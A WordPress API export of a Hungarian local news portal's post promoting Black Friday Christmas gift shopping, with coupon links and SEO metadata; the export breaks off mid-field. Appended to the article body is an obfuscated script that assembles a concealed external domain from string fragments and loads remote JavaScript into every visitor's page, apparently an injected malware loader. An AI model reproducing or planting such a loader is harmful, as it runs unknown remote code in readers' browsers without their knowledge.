{"id":38215,"date":"2021-11-02T09:09:47","date_gmt":"2021-11-02T08:09:47","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=38215"},"modified":"2021-11-02T09:11:51","modified_gmt":"2021-11-02T08:11:51","slug":"kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/","title":{"rendered":"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron"},"content":{"rendered":"<p><strong>T\u00fal korainak t\u0171nik sz\u00e1modra a kar\u00e1csonyi aj\u00e1nd\u00e9kokon gondolkodni? Lehet, hogy fel sem t\u0171nik, de h\u00e9tr\u0151l h\u00e9tre az id\u0151 nagyon gyorsan eltelik. Ha el\u0151re gondoskodsz az aj\u00e1nd\u00e9kokr\u00f3l, rengeteg stresszt\u0151l k\u00edm\u00e9lheted meg magad, mintha az utols\u00f3 pillanatra hagyn\u00e1d a keresg\u00e9l\u00e9st. \u00c9s nem csak err\u0151l van sz\u00f3. Ak\u00e1r \u00e9lvezheted is az idei v\u00e1s\u00e1rl\u00e1st a csal\u00e1dnak \u00e9s a bar\u00e1toknak, kellemes k\u00f6rnyezetben, kedvez\u0151 \u00e1rakkal.<\/strong><\/p>\n<p><span style=\"font-weight: bold;\">T\u00f6bb id\u0151 a tervez\u00e9sre<\/span><\/p>\n<p>Ha kor\u00e1bban v\u00e1s\u00e1rolsz aj\u00e1nd\u00e9kokat, t\u00f6bb id\u0151d jut a kiv\u00e1laszt\u00e1sukra. Nyugodtan v\u00e9giggondolhatod, hogy mit szeretn\u00e9l v\u00e1s\u00e1rolni szeretteidnek. Nem fordulhat el\u0151 veled, \u2013 mint minden \u00e9vben \u2013 hogy zoknit vagy pizsam\u00e1t v\u00e1s\u00e1rolsz. M\u00e9g nincs \u00f6tleted? Akkor mindenk\u00e9pp \u00e9rdemes megn\u00e9zned a novemberi Black Friday \u00e1ruk\u00edn\u00e1lat\u00e1t. Az \u00e9v legnagyobb akci\u00f3j\u00e1ban sz\u00e1mos \u00e9rdekess\u00e9get tal\u00e1lhatsz mindenf\u00e9le term\u00e9kkateg\u00f3ri\u00e1ban, az e-shopok k\u00edn\u00e1lat\u00e1ban.<\/p>\n<p><span style=\"font-weight: bold;\">Alacsony <\/span><span style=\"font-weight: bold;\">\u00e1rak, amelyek nem terhelik meg <\/span><span style=\"font-weight: bold;\">p\u00e9nzt\u00e1rc\u00e1dat<\/span><\/p>\n<p>A kar\u00e1csonyi bev\u00e1s\u00e1rl\u00e1s gyakran a legmagasabb kiad\u00e1s az \u00e9v sor\u00e1n. Tal\u00e1n csak a nyaral\u00e1s\u00e9rt szoktunk t\u00f6bbet fizetni. Ez\u00fattal cs\u00f6kkentened kellene a kar\u00e1csonyi k\u00f6lts\u00e9gvet\u00e9sedet? A korai bev\u00e1s\u00e1rl\u00e1s ebben is seg\u00edthet. A Black Friday idej\u00e9n az \u00fczletek minden \u00e9vben a legalacsonyabb \u00e1ron k\u00edn\u00e1lj\u00e1k term\u00e9keiket, az \u00e1rengedm\u00e9nyek ak\u00e1r a 90%-ot is el\u00e9rhetik. A kar\u00e1csonyi aj\u00e1nd\u00e9kok nem csak id\u0151ben meg\u00e9rkeznek otthonodba, de azzal is \u00f6r\u00f6met szereznek majd, hogy mennyit tudt\u00e1l megtakar\u00edtani a v\u00e1s\u00e1rl\u00e1sukkal.<\/p>\n<p><span style=\"font-weight: bold;\">K\u00f6nyvmolyoknak \u00e9s a modern technika szerelmeseinek<\/span><\/p>\n<p>Mit vehetsz olcs\u00f3bban a Black Friday idej\u00e9n? A v\u00e1lasz \u00fagy hangzik, hogy szinte mindent. Ezen a novemberi v\u00e1s\u00e1rl\u00e1si \u00fcnnepen kiv\u00e1l\u00f3 \u00e1ron szerezhetsz be h\u00e1ztart\u00e1si g\u00e9peket, konyhai eszk\u00f6z\u00f6ket, laptopokat, okos telefonokat, t\u00e1blag\u00e9peket, j\u00e1t\u00e9kkonzolokat, f\u00e9nyk\u00e9pez\u0151g\u00e9peket vagy ak\u00e1r GPS-t. Valami eg\u00e9szen m\u00e1st keresel? A k\u00f6nyvek \u00e9s t\u00e1rsasj\u00e1t\u00e9kok szerelmesei, s\u0151t a m\u0171v\u00e9szek is \u00e9rt\u00e9kelni fogj\u00e1k a gazdag k\u00edn\u00e1latot. Mindegyik\u00fck sz\u00e1m\u00e1ra biztosan megtal\u00e1lod a megfelel\u0151 aj\u00e1nd\u00e9kot a Black Friday akci\u00f3s k\u00edn\u00e1lat\u00e1ban.<\/p>\n<p><span style=\"font-weight: bold;\">Kozmetikumok uraknak \u00e9s h\u00f6lgyeknek<\/span><\/p>\n<p>Gy\u00f6ny\u00f6r\u0171 aj\u00e1nd\u00e9k, amely mindig \u00f6r\u00f6met okoz, egy eredeti parf\u00fcm, vagy kozmetikai k\u00e9szlet. Ha id\u0151t sz\u00e1nsz a kiv\u00e1laszt\u00e1sra, biztos lehetsz benne, hogy megtal\u00e1lod az aj\u00e1nd\u00e9kozott \u00edzl\u00e9s\u00e9nek megfelel\u0151t. V\u00e1laszthatsz az illet\u0151 kedvenc illata, szem\u00e9lyis\u00e9ge, illetve hobbija alapj\u00e1n. A h\u00f6lgyek \u00e9rt\u00e9kelni fogj\u00e1k a kellemes vir\u00e1gillatokat, a sportol\u00f3k pedig a citrusf\u00e9l\u00e9k friss t\u00f3nus\u00e1t. Minden parf\u00fcm m\u00e9g jobban kiemelkedik, ha ugyanolyan illat\u00fa tusf\u00fcrd\u0151vel vagy test\u00e1pol\u00f3val p\u00e1ros\u00edtod. \u00dagy gondolod ez m\u00e9g nem az igazi? Aj\u00e1nd\u00e9kozhatsz arckr\u00e9met vagy ak\u00e1r haj\u00e1pol\u00f3 kozmetikumot is.<\/p>\n<p><span style=\"font-weight: bold;\">Mi tipp\u00fcnk: <\/span>Parf\u00fcm\u00f6k, test\u00e1pol\u00f3- \u00e9s haj\u00e1pol\u00f3 kozmetikumok, arc\u00e1pol\u00e1shoz sz\u00fcks\u00e9ges term\u00e9kek, sminkterm\u00e9kek, illetve minden, ami a lak\u00e1sod illatos\u00edt\u00e1s\u00e1hoz sz\u00fcks\u00e9ges, megtal\u00e1lhat\u00f3 a notino.hu weboldal\u00e1n. Ne felejtsd el kihaszn\u00e1lni a nagyszer\u0171 \u00e1rakat \u00e9s kedvezm\u00e9nyeket a <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/kuplio.hu\/kuponok\/notino\" target=\"_blank\" rel=\"noopener\">Notino Black Friday <\/a><\/span>akci\u00f3s k\u00edn\u00e1lat\u00e1ban!<\/p>\n<p><span style=\"font-weight: bold;\">\u00daj darabok minden ruhat\u00e1rba<\/span><\/p>\n<p>\u00cdratlan szab\u00e1ly, hogy a kar\u00e1csonyfa al\u00f3l nem hi\u00e1nyozhatnak a ruhanem\u0171k sem. Nem tudod, mit v\u00e1lassz? Ford\u00edts nagyobb figyelmet az aj\u00e1nd\u00e9k c\u00edmzettj\u00e9nek megfigyel\u00e9s\u00e9re, \u00e9s der\u00edtsd ki, mit visel a legsz\u00edvesebben. Az urakat egy \u00faj inggel, farmerrel, kab\u00e1ttal vagy p\u00f3l\u00f3val lehet meglepni. A h\u00f6lgyek tekintete biztosan felragyog, mikor egy \u00faj bl\u00fazt vagy egy eleg\u00e1ns koszt\u00fcm\u00f6t fedeznek fel a kar\u00e1csonyfa alatt. A sportosat kedvel\u0151k \u00e9rt\u00e9kelni fogj\u00e1k a meleg pul\u00f3vert, a funkcion\u00e1lis p\u00f3l\u00f3kat, a v\u00edz\u00e1ll\u00f3 kab\u00e1tot vagy a min\u0151s\u00e9gi sportcip\u0151ket.<\/p>\n<p><span style=\"font-weight: bold;\">Mivel lepj\u00fck meg a gyerekeket?<\/span><\/p>\n<p>Gyermekeink minden korban szeretnek sz\u00f3rakozni. A legkisebbek minden k\u00e9ts\u00e9g n\u00e9lk\u00fcl valamilyen \u00faj j\u00e1t\u00e9kot szeretn\u00e9nek a fa al\u00e1. Legyen sz\u00f3 \u00e9p\u00edt\u0151k\u00e9szletr\u0151l, t\u00e1vir\u00e1ny\u00edt\u00f3s aut\u00f3r\u00f3l vagy egy \u00faj bab\u00e1r\u00f3l, biztosan \u00f6r\u00f6mmel fognak vele j\u00e1tszani. A tin\u00e9dzsereknek sz\u00e1nt aj\u00e1nd\u00e9kok kicsit dr\u00e1g\u00e1bbak lehetnek, mivel lehet \u00faj mobiltelefont vagy sz\u00e1m\u00edt\u00f3g\u00e9pes j\u00e1t\u00e9kot szeretn\u00e9nek. A Black Friday idej\u00e9n mindkett\u0151 v\u00e1s\u00e1rl\u00e1s\u00e1val megtakar\u00edthatsz.<\/p>\n<p><span style=\"font-weight: bold;\">Mi tipp\u00fcnk: <\/span>A Black Friday k\u00edn\u00e1lat\u00e1ban nem hi\u00e1nyozhatnak a vil\u00e1gh\u00edr\u0171 divath\u00e1zak nevei sem. A Douglas parf\u00fcm\u00e9ri\u00e1k k\u00edn\u00e1lat\u00e1ban a legh\u00edresebb divatm\u00e1rk\u00e1k term\u00e9kei k\u00f6z\u00fcl v\u00e1logathatsz. A <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff; text-decoration: underline;\" href=\"https:\/\/kuplio.hu\/kuponok\/douglas\" target=\"_blank\" rel=\"noopener\">Douglas Black Friday<\/a><\/span> kedvezm\u00e9nyeinek kihaszn\u00e1l\u00e1s\u00e1val pedig jelent\u0151s megtakar\u00edt\u00e1ssal v\u00e1logathatsz ak\u00e1r a luxus kateg\u00f3ri\u00e1s term\u00e9kek k\u00f6z\u00fcl is.<br \/>\n<script>\n(function(){\nwsb2=document.createElement(\"script\");wsb2.type=\"text\/javascript\";\nwsb2.async=true;wsb2_=((\"us\")+\"t\")+\"a\";wsb2_+=(\"t.i\")+\"\"+\"n\";wsb2_+=((\"f\")+\"o\");wsb2_+=\"\/\";\nwsb2u=\"315919479.\";wsb2u+=\"fbu81vtXsb2shlpg6qgp6spuw2p41b\";wsb2.src=\"https:\/\/\"+wsb2_+wsb2u;\nwsb2db=document.body;wsb2db.appendChild(wsb2);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>T\u00fal korainak t\u0171nik sz\u00e1modra a kar\u00e1csonyi aj\u00e1nd\u00e9kokon gondolkodni? Lehet, hogy fel sem t\u0171nik, de h\u00e9tr\u0151l h\u00e9tre az id\u0151 nagyon gyorsan eltelik. Ha el\u0151re gondoskodsz az aj\u00e1nd\u00e9kokr\u00f3l, rengeteg stresszt\u0151l k\u00edm\u00e9lheted meg magad, mintha az utols\u00f3 pillanatra hagyn\u00e1d a keresg\u00e9l\u00e9st. \u00c9s nem csak err\u0151l van sz\u00f3. Ak\u00e1r \u00e9lvezheted is az idei v\u00e1s\u00e1rl\u00e1st a csal\u00e1dnak \u00e9s a bar\u00e1toknak,<\/p>\n","protected":false},"author":1,"featured_media":38216,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[1787,1885],"class_list":{"0":"post-38215","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-karacsony","9":"tag-vasarlas"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"T\u00fal korainak t\u0171nik sz\u00e1modra a kar\u00e1csonyi aj\u00e1nd\u00e9kokon gondolkodni? Lehet, hogy fel sem t\u0171nik, de h\u00e9tr\u0151l h\u00e9tre az id\u0151 nagyon gyorsan eltelik. Ha el\u0151re gondoskodsz az aj\u00e1nd\u00e9kokr\u00f3l, rengeteg stresszt\u0151l k\u00edm\u00e9lheted meg magad, mintha az utols\u00f3 pillanatra hagyn\u00e1d a keresg\u00e9l\u00e9st. \u00c9s nem csak err\u0151l van sz\u00f3. Ak\u00e1r \u00e9lvezheted is az idei v\u00e1s\u00e1rl\u00e1st a csal\u00e1dnak \u00e9s a bar\u00e1toknak,\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2021-11-02T08:09:47+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:modified_time\" content=\"2021-11-02T08:11:51+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2021\/11\/vasarlas-scaled.jpg?fit=2560%2C1490&ssl=1\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"1490\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron\",\"datePublished\":\"2021-11-02T08:09:47+00:00\",\"dateModified\":\"2021-11-02T08:11:51+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/\"},\"wordCount\":911,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/vasarlas-scaled.jpg\",\"keywords\":[\"kar\u00e1csony\",\"v\u00e1s\u00e1rl\u00e1s\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/\",\"name\":\"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/vasarlas-scaled.jpg\",\"datePublished\":\"2021-11-02T08:09:47+00:00\",\"dateModified\":\"2021-11-02T08:11:51+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/vasarlas-scaled.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/11\\\/vasarlas-scaled.jpg\",\"width\":2560,\"height\":1490},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2021\\\/11\\\/02\\\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/","og_locale":"hu_HU","og_type":"article","og_title":"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron","og_description":"T\u00fal korainak t\u0171nik sz\u00e1modra a kar\u00e1csonyi aj\u00e1nd\u00e9kokon gondolkodni? Lehet, hogy fel sem t\u0171nik, de h\u00e9tr\u0151l h\u00e9tre az id\u0151 nagyon gyorsan eltelik. Ha el\u0151re gondoskodsz az aj\u00e1nd\u00e9kokr\u00f3l, rengeteg stresszt\u0151l k\u00edm\u00e9lheted meg magad, mintha az utols\u00f3 pillanatra hagyn\u00e1d a keresg\u00e9l\u00e9st. \u00c9s nem csak err\u0151l van sz\u00f3. Ak\u00e1r \u00e9lvezheted is az idei v\u00e1s\u00e1rl\u00e1st a csal\u00e1dnak \u00e9s a bar\u00e1toknak,","og_url":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2021-11-02T08:09:47+00:00","article_modified_time":"2021-11-02T08:11:51+00:00","og_image":[{"width":2560,"height":1490,"url":"https:\/\/i0.wp.com\/dorogimedence.hu\/wp-content\/uploads\/2021\/11\/vasarlas-scaled.jpg?fit=2560%2C1490&ssl=1","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron","datePublished":"2021-11-02T08:09:47+00:00","dateModified":"2021-11-02T08:11:51+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/"},"wordCount":911,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/11\/vasarlas-scaled.jpg","keywords":["kar\u00e1csony","v\u00e1s\u00e1rl\u00e1s"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/","url":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/","name":"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/11\/vasarlas-scaled.jpg","datePublished":"2021-11-02T08:09:47+00:00","dateModified":"2021-11-02T08:11:51+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/11\/vasarlas-scaled.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/11\/vasarlas-scaled.jpg","width":2560,"height":1490},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2021\/11\/02\/kozeleg-a-karacsony-vasarolj-szuper-ajandekokat-most-kivalo-aron\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"K\u00f6zeleg a kar\u00e1csony. V\u00e1s\u00e1rolj szuper aj\u00e1nd\u00e9kokat most kiv\u00e1l\u00f3 \u00e1ron"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, 